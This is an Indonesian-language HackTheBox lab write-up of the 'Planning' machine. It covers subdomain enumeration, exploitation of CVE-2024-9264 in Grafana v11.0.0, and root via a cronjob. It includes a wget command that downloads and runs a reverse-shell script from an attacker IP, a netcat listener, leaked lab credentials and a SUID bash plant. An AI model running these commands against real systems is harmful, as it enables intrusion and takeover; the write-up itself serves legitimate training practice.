
π΅οΈββοΈ HackTheBox Planning Writeup & Recon
Writeup ini membahas HTB Linux machine berjudul Planning, sebuah easy box di HackTheBox. Tujuannya adalah mendapatkan root access menggunakan kombinasi Grafana remote code execution dan privilege escalation via cronjob.
Langkah awal saya mulai dengan nmap scan untuk mengidentifikasi port terbuka:
sudo nmap -sCV -T4 10.10.11.68 -oA nmap-initial
Hasilnya menunjukkan port SSH dan HTTP terbuka, mengarah ke domain planning.htb.
π FFUF Subdomain Enumeration dan Deteksi Grafana
Saya menjalankan ffuf subdomain enumeration untuk mencari subdomain tersembunyi:
ffuf -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -u http://10.10.11.68 -H "Host: FUZZ.planning.htb" -fs 178
Ditemukan subdomain grafana.planning.htb yang menjalankan Grafana v11.0.0. Versi ini diketahui memiliki vulnerability berbahaya.
𧨠CVE-2024-9264 Exploit pada Grafana v11.0.0
Grafana v11.0.0 rentan terhadap CVE-2024-9264 exploit, yang memungkinkan remote code execution. Saya memanfaatkan hackthebox grafana exploit ini untuk menjalankan reverse shell.
Skrip eksploitasi didapat dari GitHub - CVE-2024-9264.
python3 CVE-2024-9264.py -u admin -p 0D5oT70Fq13EvB5r -c "wget http://10.10.14.128:8000/rev.sh -O /tmp/rev.sh && chmod +x /tmp/rev.sh && /tmp/rev.sh" http://grafana.planning.htb
π₯ Remote Shell via Grafana RCE
Setelah skrip dijalankan, remote shell via Grafana RCE berhasil terbuka. Saya mendapatkan shell sebagai root di dalam container Docker Grafana.
nc -nlvp 1337
Shell menunjukkan bahwa saya berada di dalam Docker container. Ini mengarah ke exploit docker container HTB untuk tahap selanjutnya.
π SSH Login dan HTB Planning Root Access
Saya menemukan environment variable di dalam container yang berisi password pengguna lokal:
GF_SECURITY_ADMIN_USER=enzo
GF_SECURITY_ADMIN_PASSWORD=RioTecRANDEntANT!
Dengan kredensial ini, saya login via SSH ke mesin utama dan berhasil masuk sebagai user enzo. Ini merupakan bagian dari HTB Planning exploit tutorial.
π Privilege Escalation via Cronjob
Saya menemukan file crontab.db yang mengatur cronjob harian dengan perintah root. Saya menanam SUID binary untuk mengeksekusi bash sebagai root.
cp /bin/bash /tmp/bash && chmod u+s /tmp/bash
Setelah beberapa menit, saya berhasil menjalankan ./bash -p dan mendapatkan akses root penuh. Teknik ini termasuk dalam Linux privilege escalation techniques yang umum digunakan di dunia nyata.
π HTB Easy Machine Guide: Kesimpulan
Mesin Planning adalah contoh sempurna HTB easy machine guide yang mengajarkan tahapan HTB Linux machine writeup dari awal hingga root.
- Recon: Subdomain dan service enumeration
- Exploit: CVE-2024-9264 exploit untuk RCE pada Grafana v11.0.0
- Privilege Escalation: Cronjob abuse dan SUID binary
